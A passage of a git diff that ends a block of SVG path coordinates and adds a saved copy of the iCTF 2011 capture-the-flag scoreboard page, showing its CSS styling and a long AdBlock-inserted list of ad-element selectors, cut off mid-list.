C 783.98976,53 783.94554,53.229458 785.11971,54.644246 C 786.33772,56.111852 786.22999,56.207771 784.11693,55.537112 C 782.43008,55.001727 781.95607,55.119911 782.46801,55.948234 C 783.37977,57.4235 786.58407,56.781602 786.25,55.19061 z M 1212.9991,65.785184 C 1213.0011,64.191058 1217.3452,62.911025 1221.784,63.196599 C 1228.785,63.647005 1227.4934,65.426428 1219.7491,66 C 1216.0361,66.275 1212.9986,66.178333 1212.9991,65.785184 z M 1223.75,64.283746 C 1222.2375,64.054621 1219.7625,64.054621 1218.25,64.283746 C 1216.7375,64.51287 1217.975,64.700336 1221,64.700336 C 1224.025,64.700336 1225.2625,64.51287 1223.75,64.283746 z M 146.5153,59.024748 C 145.92713,58.073077 149.76594,54.979903 151.47251,55.030409 C 152.03763,55.047133 151.70304,55.524791 150.72897,56.091869 C 149.7549,56.658948 149.18982,57.49811 149.47322,57.956676 C 149.75663,58.415241 149.33051,59.04293 148.52628,59.351541 C 147.72205,59.660152 146.81711,59.513095 146.5153,59.024748 z M 1076.3559,56.75 C 1076.0953,56.3375 1076.6101,56 1077.5,56 C 1078.3899,56 1078.8691,55.597153 1078.5648,55.104785 C 1077.8399,53.931972 1081.1634,52.661232 1081.9201,53.821888 C 1082.239,54.311183 1084.1717,55.018854 1086.2149,55.39449 C 1092.9992,56.641761 1091.6423,58.118161 1084.0045,57.799417 C 1080.0585,57.634737 1076.6166,57.1625 1076.3559,56.75 z M 1086.25,56.337719 C 1085.5625,56.060307 1084.4375,56.060307 1083.75,56.337719 C 1083.0625,56.615132 1083.625,56.842105 1085,56.842105 C 1086.375,56.842105 1086.9375,56.615132 1086.25,56.337719 z M 184.08218,52.589565 C 181.67584,51.256363 181.67427,51.244694 183.75138,50.133056 C 184.9641,49.484027 187.86215,49.259141 190.66921,49.596239 L 195.5,50.176365 L 192.56575,48.551896 C 190.95192,47.658439 189.05333,47.149292 188.34668,47.420459 C 186.78464,48.019871 181.76634,45.566989 182.6818,44.651533 C 183.61347,43.71986 188,43.844343 188,44.802456 C 188,45.243806 190.21719,46.4022 192.92708,47.376665 C 196.65527,48.717304 198.34093,48.887907 199.85464,48.077795 C 200.9549,47.488953 202.56271,47.278703 203.42756,47.610575 C 204.2924,47.942446 205,47.74239 205,47.166006 C 205,45.483311 202.92426,44.675736 201.71287,45.887132 C 201.10079,46.49921 199.9025,46.989753 199.05,46.97723 C 198.1975,46.964706 198.94397,46.242473 200.70883,45.372266 C 203.74246,43.876461 204.06499,43.905961 206.61596,45.912553 C 208.26269,47.207874 210.05153,47.801032 211.20609,47.434589 C 212.2466,47.104344 214.17731,47.541386 215.49657,48.405794 C 216.81582,49.270201 218.58222,49.713811 219.4219,49.391594 C 220.76817,48.874985 220.75325,48.610397 219.29571,47.152873 C 217.75852,45.615701 217.76349,45.476757 219.36668,45.167957 C 220.31481,44.985333 222.30767,45.256081 223.79527,45.769619 C 225.50132,46.358566 228.73504,46.330587 232.55313,45.693842 C 235.88235,45.138627 239.77021,44.976495 241.19283,45.333548 C 244.2112,46.091111 245.52425,48.66339 243.89481,50.626748 C 242.42921,52.392687 233.1267,52.492927 232.45677,50.75 C 232.16791,49.998511 230.00733,49.471301 227.03917,49.428039 C 224.32374,49.38846 222.31142,49.694866 222.56733,50.10894 C 223.42427,51.495494 221.19438,52.0244 218.61932,51.045365 C 217.14369,50.484332 215.83871,50.45196 215.51949,50.968468 C 215.21626,51.459094 211.93783,51.876046 208.23409,51.895027 C 204.53034,51.914009 199.07608,52.395393 196.11351,52.964769 C 189.18149,54.297035 187.04371,54.230367 184.08218,52.589565 z M 193,52.605035 C 193,52.387805 191.23785,52.042023 189.08412,51.836631 C 186.93038,51.63124 185.38194,51.808974 185.64313,52.231596 C 186.11838,53.000566 193,53.349882 193,52.605035 z M 206.95748,50.843074 C 214.59667,50.792974 217.73981,49.881604 214.52628,48.648459 C 213.72205,48.339848 212.81857,48.484542 212.51854,48.970001 C 212.20464,49.477904 210.61602,49.463468 208.77684,48.935999 C 206.74395,48.352972 205.22021,48.379786 204.59033,49.009672 C 204.04565,49.554353 202.2275,50.006891 200.55,50.015313 C 198.8725,50.023735 196.825,50.503213 196,51.080819 C 194.8185,51.908025 194.96748,51.999887 196.70168,51.513455 C 197.91261,51.173798 202.52772,50.872126 206.95748,50.843074 z M 241.58686,49.212102 C 243.28099,46.895241 242.53692,46.117882 238.73262,46.230162 C 236.95468,46.282636 236.0589,46.513618 236.74201,46.743455 C 237.58776,47.028014 237.69166,47.707626 237.06767,48.873565 C 236.34464,50.224546 236.59434,50.619162 238.25119,50.743968 C 239.40612,50.830967 240.90717,50.141627 241.58686,49.212102 z M 248.62367,52.166018 C 245.76779,51.616064 247.40625,49.524219 250.96538,49.176321 C 255.55356,48.727837 259,49.749932 259,51.559109 C 259,52.730533 258.00688,53.013449 254.679,52.790057 C 252.30246,52.630526 249.57755,52.349708 248.62367,52.166018 z M 257.5,51 C 257.16008,50.45 255.22102,50.031628 253.19098,50.070285 C 250.21631,50.12693 249.88814,50.307359 251.5,51 C 254.30808,52.206672 258.24576,52.206672 257.5,51 z M 1068.1566,51.591381 C 1065.9379,50.396801 1065.905,50.237882 1067.5379,48.60499 C 1069.049,47.093845 1070.7307,46.953142 1081.1208,47.468505 C 1087.6428,47.792006 1093.9796,48.426816 1095.2025,48.879193 C 1097.3872,49.687376 1097.3911,49.720325 1095.4267,50.771622 C 1092.2691,52.461556 1070.9624,53.10205 1068.1566,51.591381 z M 1085.3821,50.310287 C 1086.8871,49.88735 1086.9873,49.605933 1085.8821,48.905989 C 1083.8217,47.601019 1080.7469,47.78152 1081.5974,49.157524 C 1082.1077,49.983225 1081.6229,50.094016 1079.9064,49.544004 C 1072.8795,47.29248 1067.6813,48.057239 1069.5425,51.068725 C 1070.1755,52.093055 1080.8586,51.581525 1085.3821,50.310287 z M 1094,50 C 1094,49.45 1092.65,49 1091,49 C 1089.35,49 1088,49.45 1088,50 C 1088,50.55 1089.35,51 1091,51 C 1092.65,51 1094,50.55 1094,50 z M 1102.2144,51.923125 C 1097.8091,50.583987 1098.9685,49.158859 1104.2438,49.428512 C 1106.5847,49.548168 1110.525,49.739387 1113,49.853443 C 1116.4697,50.013336 1117.1159,50.284927 1115.8223,51.039626 C 1113.2284,52.55301 1105.8602,53.031391 1102.2144,51.923125 z M 1109.5,51 C 1108.4,50.527314 1106.375,50.115833 1105,50.085598 C 1103.0296,50.042272 1102.8178,50.23599 1104,51 C 1104.825,51.533156 1106.85,51.944637 1108.5,51.914402 C 1111.0757,51.867204 1111.2171,51.737882 1109.5,51 z M 175.66274,51.275326 C 172.93035,50.866023 172.88988,50.779164 174.56773,48.925158 C 175.52597,47.866321 177.02773,46.964474 177.90499,46.921053 C 178.81882,46.875821 178.99807,46.637333 178.3247,46.362619 C 177.67829,46.098902 175.33371,46.809429 173.11454,47.941567 C 168.25419,50.421134 166.85754,50.534814 167.68302,48.383666 C 168.18548,47.074261 167.94216,46.94693 166.40163,47.71312 C 164.8331,48.493237 160.88935,48.615387 154.55,48.080202 C 152.29587,47.889902 155.79635,46.201878 159.5,45.693187 C 161.7,45.391019 162.7125,45.369434 161.75,45.64522 C 160.7875,45.921006 160,46.472062 160,46.86979 C 160,47.872825 163.99122,47.558063 167,46.317745 C 168.375,45.750925 170.175,45.033077 171,44.722528 C 171.86552,44.396726 171.23105,44.071731 169.5,43.954192 C 167.42896,43.813565 168.20309,43.485041 172,42.893245 C 178.63995,41.858325 182.6662,42.492351 181.13909,44.332405 C 180.38784,45.237606 180.63628,45.916267 182.03974,46.792743 C 183.87702,47.940142 183.88881,48.106993 182.26665,50.001539 C 181.32553,51.100692 180.09303,51.932576 179.52776,51.850168 C 178.96249,51.76776 177.22323,51.509081 175.66274,51.275326 z M 176,45 C 177.29269,44.164601 177.26629,44.028509 175.80902,44.015313 C 174.87898,44.006891 173.83992,44.45 173.5,45 C 172.71782,46.265597 174.04163,46.265597 176,45 z M 891.57034,51.113809 C 891.08167,50.323122 893.5416,49.852407 906,48.352652 C 907.925,48.120918 915.96105,47.511575 923.8579,46.998556 C 931.75474,46.485537 938.81686,45.566956 939.55149,44.957264 C 941.14684,43.633244 950.67157,40.994854 953.5,41.09347 C 954.6,41.131822 952.35,41.941231 948.5,42.892155 C 944.65,43.84308 941.58036,45.059931 941.67857,45.596269 C 941.77679,46.132607 941.10179,46.648264 940.17857,46.742174 C 939.25536,46.836084 936.475,47.163169 934,47.469029 C 931.525,47.774889 925.675,48.196536 921,48.406023 C 908.87015,48.949559 899.12223,50.003029 896.30241,51.075122 C 893.26486,52.229998 892.26523,52.238171 891.57034,51.113809 z M 1062,49 C 1062,47.706093 1063.7003,47.706093 1064.5,49 C 1064.8399,49.55 1064.4165,50 1063.559,50 C 1062.7016,50 1062,49.55 1062,49 z M 638.25,44.02693 C 635.9125,42.9659 634,41.68846 634,41.188175 C 634,40.68789 632.42839,40.403266 630.50753,40.555677 C 628.13705,40.743763 626.28982,40.190242 624.75753,38.832691 C 622.68723,36.99847 622.66587,36.881206 624.5,37.418751 C 626.40308,37.976502 626.41185,37.936425 624.68098,36.591746 C 622.93097,35.232186 622.93566,35.155195 624.80488,34.56193 C 625.87347,34.22277 629.84203,33.953254 633.62389,33.963006 C 641.00352,33.982035 645.59243,33.653356 653.5,32.539389 C 656.71987,32.085794 658.02519,32.170825 657.16635,32.778223 C 656.21596,33.450375 656.69061,33.68961 658.81805,33.610713 C 660.45999,33.549821 661.55999,33.104121 661.2625,32.620268 C 660.96501,32.136416 661.34675,31.963108 662.1108,32.235141 C 662.87486,32.507173 664.175,32.394666 665,31.985125 C 666.71558,31.13349 680.08481,32.726818 681.3125,33.929227 C 682.57304,35.163813 674.99613,36.714314 668.63099,36.524308 C 665.4788,36.430212 662.69841,36.678959 662.45236,37.07708 C 662.20631,37.4752 664.30147,38.626736 667.10827,39.636048 L 672.21155,41.47116 L 669.35577,42.627055 C 667.56162,43.353249 665.01301,43.494297 662.5,43.006473 C 660.3,42.579412 658.95,42.163937 659.5,42.083196 C 660.05,42.002454 659.67594,41.31186 658.66875,40.548541 C 657.28407,39.499137 656.12572,39.408816 653.91875,40.178169 C 652.31344,40.737784 651,41.601629 651,42.097825 C 651,42.594021 650.14814,43 649.10699,43 C 648.06583,43 646.95496,43.675 646.63837,44.5 C 645.871,46.499731 643.38937,46.359777 638.25,44.02693 z M 646.41097,43.371408 C 646.93408,42.008203 646.52376,41.845248 643.89296,42.371408 C 642.16433,42.717134 640.24375,43.053242 639.625,43.118315 C 638.71807,43.213695 642.30154,44.358852 645.14301,44.881685 C 645.49667,44.946758 646.06725,44.267134 646.41097,43.371408 z M 667.58928,40.790025 C 666.69298,40.28843 664.95622,40.209871 663.72982,40.615449 C 661.5047,41.351308 661.50527,41.354248 664,42.008703 C 667.36886,42.892476 669.84428,42.051989 667.58928,40.790025 z M 650.16667,41.135084 C 650.35,40.65938 652.3,39.30996 654.5,38.136372 C 657.45801,36.558426 657.81675,36.152418 655.87714,36.577786 C 654.43457,36.894151 650.95684,36.470729 648.14886,35.636847 C 642.0707,33.831827 640.47548,35.100066 645.2005,37.980859 L 648.5,39.992524 L 643.5,40.146456 L 638.5,40.300387 L 643,41 C 649.82094,42.060448 649.81012,42.060244 650.16667,41.135084 z M 636.05357,38.481098 C 639.17096,37.381221 640.55053,37.272737 641.0543,38.087861 C 641.49641,38.803201 641.97319,38.852395 642.36229,38.222819 C 642.69905,37.67793 641.54744,36.64097 639.80315,35.918464 C 637.67046,35.035071 636.51637,34.950904 636.2795,35.661485 C 636.05094,36.347175 634.44794,36.447013 631.71364,35.945855 C 626.51679,34.993349 625.98034,35.335003 630.03542,37.014672 C 632.28499,37.946475 632.77368,38.527641 631.81749,39.133961 C 629.83442,40.391414 631.26334,40.17119 636.05357,38.481098 z M 677.5,35.065118 C 679.25916,34.896335 679.19894,34.751436 677,33.86186 C 675.625,33.305608 672.77938,33.119745 670.67641,33.448832 C 668.01208,33.865762 667.06009,33.71179 667.53647,32.940989 C 668.04211,32.12285 662.85129,34.183838 661.28899,35.421516 C 661.02663,35.629369 674.76765,35.327273 677.5,35.065118 z M 188.2197,42.561559 C 182.30367,41.11757 179.63279,39.356627 184.875,40.35636 C 186.73125,40.710362 189.57031,41 191.18402,41 C 192.88538,41 193.85838,41.420124 193.5,42 C 193.16008,42.55 193.58352,43 194.44098,43 C 195.29844,43 196,42.598145 196,42.106989 C 196,40.962039 193.56426,40.032405 190.16821,39.881204 C 188.68092,39.814986 189.85826,39.333122 192.82834,38.79246 C 195.75893,38.258988 199.30603,38.110977 200.71078,38.463546 C 203.23868,39.098008 203.24471,39.123365 201.29874,40.936309 C 198.51286,43.531751 194.3261,44.052013 188.2197,42.561559 z M 214.88029,42.355754 C 213.6589,40.884079 213.77725,40.790921 216.00784,41.468149 C 219.51883,42.534115 220.85894,44 218.32244,44 C 217.17979,44 215.63082,43.260089 214.88029,42.355754 z M 245.77055,42.006027 C 242.64392,41.064333 239.58952,38.371722 240.79959,37.623859 C 242.21924,36.746468 253.39002,38.670059 253.78674,39.860225 C 253.9957,40.487101 255.28072,41 256.64235,41 C 258.03816,41 258.84845,41.436191 258.5,42 C 257.77132,43.179036 249.67793,43.182868 245.77055,42.006027 z M 250.5,40 C 250.86506,39.409327 249.76356,39.006268 247.80902,39.015313 C 245.30464,39.026902 244.86475,39.266346 246,40 C 247.94393,41.256262 249.72359,41.256262 250.5,40 z M 228,41 C 229.85794,40.404983 228.89485,40.17376 224.25,40.09968 C 220.8125,40.044856 218,39.55 218,39 C 218,38.45 217.325,38 216.5,38 C 215.675,38 215,37.607514 215,37.127808 C 215,35.720433 222.8705,34.860326 225.05428,36.029051 C 226.14716,36.613942 227.45895,36.834387 227.96937,36.51893 C 228.47979,36.203472 230.97471,36.468442 233.51364,37.107751 C 236.88752,37.957304 237.83206,38.56794 237.02329,39.376706 C 236.21453,40.185473 235.71466,40.156346 235.16593,39.268479 C 234.75299,38.600337 232.40923,37.831941 229.95757,37.560932 C 227.50591,37.289923 224.15,36.798089 222.5,36.467967 L 219.5,35.867746 L 222.5,37.299792 C 226.8868,39.393823 235.35053,41.186456 237.30658,40.43585 C 238.26932,40.066411 239,40.263668 239,40.893011 C 239,41.602842 236.57828,41.964237 232.25,41.90032 C 227.34947,41.827952 226.18499,41.581268 228,41 z M 935.27613,40.686564 C 935.49641,40.033954 936.60873,39.5 937.74796,39.5 C 938.88719,39.5 940.07821,39.244231 940.39468,38.931624 C 940.71115,38.619018 937.03932,38.28511 932.23504,38.189607 C 923.12805,38.008571 921.04622,37.76598 914.62866,36.137972 C 912.49943,35.597828 910.23652,35.355745 909.59997,35.600011 C 908.96342,35.844277 907.55607,35.395874 906.47251,34.60356 C 904.57568,33.216562 904.61394,33.136237 907.50121,32.443607 C 909.15054,32.047947 910.95,31.386661 911.5,30.974084 C 913.58603,29.409263 922.78701,28.865842 927.11408,30.051898 C 930.79509,31.060867 931.17856,31.383089 929.5,32.056756 C 927.5,32.859429 927.5,32.859429 929.5,33.036014 C 930.6,33.133135 932.175,33.312791 933,33.435249 C 933.825,33.557707 935.31406,33.734872 936.30902,33.82895 C 937.30398,33.923027 937.83992,34.45 937.5,35 C 936.46101,36.681113 937.97247,38.081599 939.81069,37.141037 C 942.63403,35.696413 947.22115,34.833159 946.58241,35.86666 C 946.254,36.398033 946.87464,36.584038 947.99685,36.290572 C 949.09664,36.002972 951.17766,36.541615 952.62135,37.487558 C 954.06505,38.4335 954.93928,38.710776 954.56411,38.103727 C 954.18893,37.496677 954.31038,37 954.83399,37 C 955.35761,37 956.04504,37.675 956.36163,38.5 C 956.81787,39.688954 955.95876,40.037924 952.21862,40.182888 C 949.62338,40.283477 946.21529,40.275361 944.64508,40.164854 C 943.07488,40.054346 940.23439,40.3935 938.33289,40.918529 C 935.76087,41.628699 934.97817,41.569304 935.27613,40.686564 z M 951.5,38.998342 C 952.86556,38.978564 953.10577,38.719014 952.25724,38.180146 C 951.22959,37.527522 943.76168,37.375579 942,37.971451 C 940.61465,38.44003 945.78145,39.845137 947.5,39.467173 C 948.6,39.225248 950.4,39.014274 951.5,38.998342 z M 934.30984,36.564197 C 936.7895,34.684155 935.69165,34.364726 927,34.437341 C 918.52822,34.508119 915.81845,36.343042 923.53609,36.782934 C 926.26624,36.938548 928.95,37.240521 929.5,37.453987 C 931.32754,38.163291 932.48255,37.949622 934.30984,36.564197 z M 923.95566,32.358868 C 926.21148,31.907705 926.76704,31.467788 925.83066,30.874181 C 923.85523,29.621881 918.90576,29.904411 915.5,31.463885 L 912.5,32.837562 L 916.625,32.918781 C 918.89375,32.963452 922.19255,32.711491 923.95566,32.358868 z M 234.5,34 C 234.14044,33.418215 235.13661,33 236.88197,33 C 238.53197,33 240.16008,33.45 240.5,34 C 240.85956,34.581785 239.86339,35 238.11803,35 C 236.46803,35 234.83992,34.55 234.5,34 z M 747,32.44987 C 741.89944,30.988939 741.19885,31.122228 757.69725,30.414698 C 763.78296,30.153714 767.12767,30.397563 767.58373,31.135478 C 768.05745,31.901966 767.1578,32.12049 764.70663,31.834329 C 762.74514,31.605337 761.32866,31.722774 761.5589,32.0953 C 762.82827,34.149183 753.70828,34.371292 747,32.44987 z M 770,33 C 768.89475,32.28573 769.55266,32.030626 772.5,32.030626 C 775.44734,32.030626 776.10525,32.28573 775,33 C 774.175,33.533156 773.05,33.969374 772.5,33.969374 C 771.95,33.969374 770.825,33.533156 770,33 z M 781,33.571429 C 781,33.335714 781.6796,32.46326 782.51022,31.632641 C 783.85717,30.285687 783.62415,30.186733 780.35474,30.717285 C 777.97852,31.102893 776.91105,30.952943 777.32014,30.291012 C 778.07877,29.063531 785.2328,27.986613 787.93469,28.693172 C 789.07967,28.992591 789.64337,29.765782 789.32381,30.598536 C 788.58756,32.517195 793.85976,32.420645 796.44113,30.468197 C 798.56963,28.858283 802.57598,28.504902 803.40949,29.853551 C 803.69996,30.323536 806.4821,30.307994 809.60059,29.818967 C 812.71556,29.330492 815.50473,29.171394 815.79875,29.465415 C 816.94629,30.612961 814.6469,31.473717 809.68617,31.753601 C 806.83378,31.914533 801.125,32.457988 797,32.961279 C 788.85469,33.955088 781,34.254622 781,33.571429 z " + id="path2171" /> +</svg> diff --git a/ictf2011/scoreboard.ictf2011_end.info.html b/ictf2011/scoreboard.ictf2011_end.info.html @@ -0,0 +1,135 @@ + +<!-- saved from url=(0032)http://scoreboard.ictf2011.info/ --> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> +<script src="./scoreboard.ictf2011_end.info_files/jquery.min.js" type="text/javascript"></script> +<script src="./scoreboard.ictf2011_end.info_files/highcharts.js" type="text/javascript"></script> + +<style type="text/css"> + +body {background-color:#131a22; +} + +body {background-color:#131a22; +} +.ictf_header +{ + color: #8CA3A1; + font-family:sans-serif; + font-size:32px; + text-aling:center; + background-color: #131a22; + height: 60px; +} + +.main +{ + width: 100%; +margin-left: auto; +margin-right: auto; +} +.radar +{ + width: 100%; + min-width:640px; + height: 400px; + background-color:#131a22; + /*background-image: url('img/radar.jpg'); + background-repeat:repeat;*/ +} + +.graph +{ + min-width:200px; + height: 400px; + background-color: #131a22; + background-size: 100%; + background-repeat:no-repeat; + background-position:center; +} + +.chart +{ + height: 3500px; + width: 100%; + background-color: #131a22; + background-size: 100%; + color: red; + background-position:center; + float:left; + +} + +table.dashboard +{ + width:100%; + border-width: 0px; + border-spacing: 0px; + border-style: none; + border-color: gray; + border-collapse:collapse; +} + +table.dashboard th { + border-width: 0px; + padding: 0px; + border-style: none; + border-color: gray; + background-color: white; + -moz-border-radius: ; +} +table.dashboard td { + border-width: 0px; + padding: 0px; + border-style: none; + border-color: gray; + background-color: white; + -moz-border-radius: ; +} +table.dashboard td.td_radar +{ + width:50%; +} +table.dashboard td.td_graph +{ + width:50%; +} +</style> + +</head><style type="text/css" style="display: none !important; ">/*This block of style rules is inserted by AdBlock*/#FFN_Banner_Holder,#FFN_imBox_Container,#RadAd_Skyscraper,#ab_pointer,#adxLeaderboard,#bbccom_leaderboard,#center_banner,#dir_ads_site,#flashad,#footer_adcode,#hbBHeaderSpon,#hiddenHeaderSpon,#navbar_adcode,#p360-format-box,#rightAds,#rightcolumn_adcode,#rm_container,#tads table[align="center"][width="100%"],#tooltipbox[class^="itxt"],#top-advertising,#topMPU,#tracker_advertorial,#ve_threesixty_swf[name="ve_threesixty_swf"],.ad-now,.ad_marquee,.dfpad,.kLink span[id^="preLoadWrap"].preLoadWrap,.prWrap,[id^="ad_block"],[id^="adbrite"],[id^="dclkAds"],[id^="ew"][id$="_bannerDiv"],[id^="konaLayer"],[src*="sixsigmatraffic.com"],a[href^="http://ad."][href*=".doubleclick.net/"],a[href^="http://adserver.adpredictive.com"],div[class^="dms_ad_IDS"],div[id^="adKontekst_"],div[id^="google_ads_div"],div[id^="kona_"][id$="_wrapper"],div[id^="sponsorads"],div[id^="y5_direct"],embed[flashvars*="AdID"],iframe[id^="dapIfM"],iframe[id^="etarget"][id$="banner"],iframe[name^="AdBrite"],iframe[name^="google_ads_"],img[src^="http://cdn.adnxs.com"],script[src="//pagead2.googleadservices.com/pagead/show_ads.js"] + ins > ins > iframe,script[src="http://pagead2.googlesyndication.com/pagead/show_ads.js"] + ins > ins > iframe,table[cellpadding="0"][width="100%"] > * > * > * > div[id^="tpa"],#A9AdsMiddleBoxTop,#A9AdsOutOfStockWidgetTop,#A9AdsServicesWidgetTop,#ADNETwallBanner1,#ADNETwallBanner2,#ADSLOT_1,#ADSLOT_2,#ADSLOT_3,#ADSLOT_4,#ADSLOT_SKYSCRAPER,#ADVERTISE_HERE_ROW,#AD_CONTROL_22,#AD_CONTROL_28,#AD_CONTROL_29,#AD_CONTROL_8,#AD_ROW,#AD_Top,#AD_newsblock,#ADgoogle_newsblock,#ADsmallWrapper,#Ad160x600,#Ad300x250,#Ad3Left,#Ad3Right,#Ad3TextAd,#AdArea,#AdBanner_F1,#AdBar,#AdBar1,#AdBox2,#AdContainer,#AdContainerTop,#AdContentModule_F,#AdDetails_GoogleLinksBottom,#AdDetails_InsureWith,#AdFrame4,#AdHeader,#AdLeaderboardBottom,#AdLeaderboardTop,#AdMiddle,#AdMobileLink,#AdPopUp,#AdRectangle,#AdSenseDiv,#AdSenseResults1_adSenseSponsorDiv,#AdServer,#AdShowcase_F1,#AdSky23,#AdSkyscraper,#AdSpacing,#AdSponsor_SF,#AdSubsectionShowcase_F1,#AdTargetControl1_iframe,#AdTop,#AdTopLeader,#Ad_BelowContent,#Ad_Block,#Ad_Center1,#Ad_Right1,#Ad_RightBottom,#Ad_RightTop,#Ad_Top,#Adbanner,#Adrectangle,#AdsContent,#AdsRight,#AdsWrap,#Ads_BA_CAD,#Ads_BA_CAD2,#Ads_BA_CAD_box,#Ads_BA_SKY,#Ads_CAD,#Ads_OV_BS,#Ads_Special,#AdvertMPU23b,#AdvertPanel,#AdvertiseFrame,#Advertisement,#Advertisements,#Advertorial,#Advertorials,#AdvertsBottom,#AdvertsBottomR,#BANNER_160x600,#BANNER_300x250,#BANNER_728x90,#BannerAd,#BannerAdvert,#BigBoxAd,#BodyAd,#BotAd,#Bottom468x60AD,#ButtonAd,#ClickPop_LayerPop_Container,#CompanyDetailsNarrowGoogleAdsPresentationControl,#CompanyDetailsWideGoogleAdsPresentationControl,#ContentAd,#ContentAd1,#ContentAd2,#ContentAdPlaceHolder1,#ContentAdPlaceHolder2,#ContentAdXXL,#ContentPolepositionAds_Result,#CornerAd,#DartAd300x250,#DivAdEggHeadCafeTopBanner,#FIN_videoplayer_300x250ad,#FooterAd,#FooterAdContainer,#GOOGLE_ADS_47,#GoogleAd1,#GoogleAd2,#GoogleAd3,#GoogleAdsPlaceHolder,#GoogleAdsPresentationControl,#GoogleAdsense,#Google_Adsense_Main,#HEADERAD,#HOME_TOP_RIGHT_BOXAD,#HeaderAD,#HeaderAdsBlock,#HeaderAdsBlockFront,#HeaderBannerAdSpacer,#HeaderTextAd,#HeroAd,#HomeAd1,#HouseAd,#ID_Ad_Sky,#JobsearchResultsAds,#Journal_Ad_125,#Journal_Ad_300,#JuxtapozAds,#KH-contentAd,#LargeRectangleAd,#LeftAd,#LeftAd1,#LeftAdF1,#LeftAdF2,#LftAd,#LoungeAdsDiv,#LowerContentAd,#MPUAdSpace,#MainSponsoredLinks,#Meebo\:AdElement\.Root,#Nightly_adContainer,#NormalAdModule,#OpenXAds,#OverrideAdArea,#PREFOOTER_LEFT_BOXAD,#PREFOOTER_RIGHT_BOXAD,#PageLeaderAd,#PreRollAd,#RelevantAds,#RgtAd1,#RightAd,#RightBottom300x250AD,#RightNavTopAdSpot,#RightSponsoredAd,#SectionAd300-250,#SectionSponsorAd,#SideAdMpu,#SidebarAdContainer,#SkyAd,#SpecialAds,#SponsoredAd,#SponsoredLinks,#TL_footer_advertisement,#TOP_ADROW,#TOP_RIGHT_BOXAD,#Tadspacefoot,#Tadspacehead,#Tadspacemrec,#TextLinkAds,#ThreadAd,#Top468x60AD,#TopAd,#TopAdBox,#TopAdContainer,#TopAdDiv,#TopAdPos,#TopBannerAd,#VM-MPU-adspace,#VM-footer-adspace,#VM-header-adspace,#VM-header-adwrap,#XEadLeaderboard,#XEadSkyscraper,#YahooAdParentContainer,#_ads,#abHeaderAdStreamer,#about_adsbottom,#abovepostads,#ad-1000x90-1,#ad-120x600-sidebar,#ad-120x60Div,#ad-160x600,#ad-160x600-sidebar,#ad-250,#ad-250x300,#ad-300,#ad-300x250,#ad-300x250-1,#ad-300x250-sidebar,#ad-300x250Div,#ad-300x60-1,#ad-376x280,#ad-728,#ad-728x90,#ad-728x90-1,#ad-728x90-leaderboard-top,#ad-728x90-top0,#ad-ads,#ad-article,#ad-banner,#ad-banner-1,#ad-bigbox,#ad-billboard-bottom,#ad-block-125,#ad-bottom,#ad-bottom-wrapper,#ad-box,#ad-box-first,#ad-box-second,#ad-boxes,#ad-bs,#ad-buttons,#ad-colB-1,#ad-column,#ad-container,#ad-content,#ad-contentad,#ad-first-post,#ad-flex-first,#ad-footer,#ad-footprint-160x600,#ad-frame,#ad-front-footer,#ad-front-sponsoredlinks,#ad-fullbanner2,#ad-globalleaderboard,#ad-halfpage,#ad-header,#ad-header-728x90,#ad-horizontal-header,#ad-img,#ad-inner,#ad-label,#ad-leaderboard,#ad-leaderboard-1-container,#ad-leaderboard-bottom,#ad-leaderboard-container,#ad-leaderboard-spot,#ad-leaderboard-top,#ad-left,#ad-left-sidebar-ad-1,#ad-left-sidebar-ad-2,#ad-left-sidebar-ad-3,#ad-links-content,#ad-list-row,#ad-lrec,#ad-medium,#ad-medium-rectangle,#ad-medrec,#ad-middlethree,#ad-middletwo,#ad-module,#ad-mpu,#ad-mpu1-spot,#ad-mpu2,#ad-mpu2-spot,#ad-north,#ad-one,#ad-placard,#ad-placeholder,#ad-rectangle,#ad-right,#ad-right-sidebar-ad-1,#ad-right-sidebar-ad-2,#ad-righttop,#ad-row,#ad-side,#ad-side-text,#ad-sidebar,#ad-sky,#ad-skyscraper,#ad-slot-right,#ad-slug-wrapper,#ad-small-banner,#ad-space,#ad-special,#ad-splash,#ad-sponsors,#ad-spot,#ad-squares,#ad-story-bottom-out,#ad-story-right,#ad-target,#ad-target-Leaderbord,#ad-teaser,#ad-text,#ad-top,#ad-top-banner,#ad-top-text-low,#ad-top-wrap,#ad-tower,#ad-trailerboard-spot,#ad-two,#ad-typ1,#ad-unit,#ad-wrap,#ad-wrap-right,#ad-wrapper,#ad-wrapper1,#ad-yahoo-simple,#ad-zone-1,#ad-zone-2,#ad-zone-inline,#ad01,#ad02,#ad1006,#ad11,#ad125BL,#ad125BR,#ad125TL,#ad125TR,#ad125x125,#ad160x600,#ad160x600right,#ad1Sp,#ad2Sp,#ad300,#ad300-250,#ad300X250,#ad300_x_250,#ad300x100Middle,#ad300x150,#ad300x250,#ad300x250Module,#ad300x60,#ad300x600,#ad300x600_callout,#ad336,#ad336x280,#ad375x85,#ad468,#ad468x60,#ad468x60_top,#ad526x250,#ad600,#ad728,#ad728Mid,#ad728Top,#ad728Wrapper,#ad728top,#ad728x90,#ad728x90_1,#ad90,#adBadges,#adBanner,#adBanner10,#adBanner120x600,#adBanner160x600,#adBanner2,#adBanner3,#adBanner336x280,#adBanner4,#adBanner728,#adBanner9,#adBannerTable,#adBannerTop,#adBar,#adBelt,#adBlock125,#adBlockTop,#adBlocks,#adBottbanner,#adBox,#adBox11,#adBox16,#adBox350,#adBox390,#adCirc300X200,#adCirc_620_100,#adCol,#adColumn,#adCompanionSubstitute,#adComponentWrapper,#adContainer,#adContainer_1,#adContainer_2,#adContainer_3,#adDiv,#adDiv300,#adDiv728,#adFiller,#adFps,#adFtofrs,#adGallery,#adGoogleText,#adGroup1,#adHeader,#adHeaderTop,#adIsland,#adLB,#adLabel,#adLayer,#adLeader,#adLeaderTop,#adLeaderboard,#adMPU,#adMediumRectangle,#adMiddle0Frontpage,#adMiniPremiere,#adMonster1,#adOuter,#adPlaceHolderRight,#adPlacer,#adPosOne,#adRight,#adRight2,#adSPLITCOLUMNTOPRIGHT,#adSenseModule,#adSenseWrapper,#adServer_marginal,#adShortTower,#adSidebar,#adSidebarSq,#adSky,#adSkyscraper,#adSlider,#adSpace,#adSpace0,#adSpace1,#adSpace10,#adSpace11,#adSpace12,#adSpace13,#adSpace14,#adSpace15,#adSpace16,#adSpace17,#adSpace18,#adSpace19,#adSpace2,#adSpace20,#adSpace21,#adSpace22,#adSpace23,#adSpace24,#adSpace25,#adSpace3,#adSpace300_ifrMain,#adSpace4,#adSpace5,#adSpace6,#adSpace7,#adSpace8,#adSpace9,#adSpace_footer,#adSpace_right,#adSpace_top,#adSp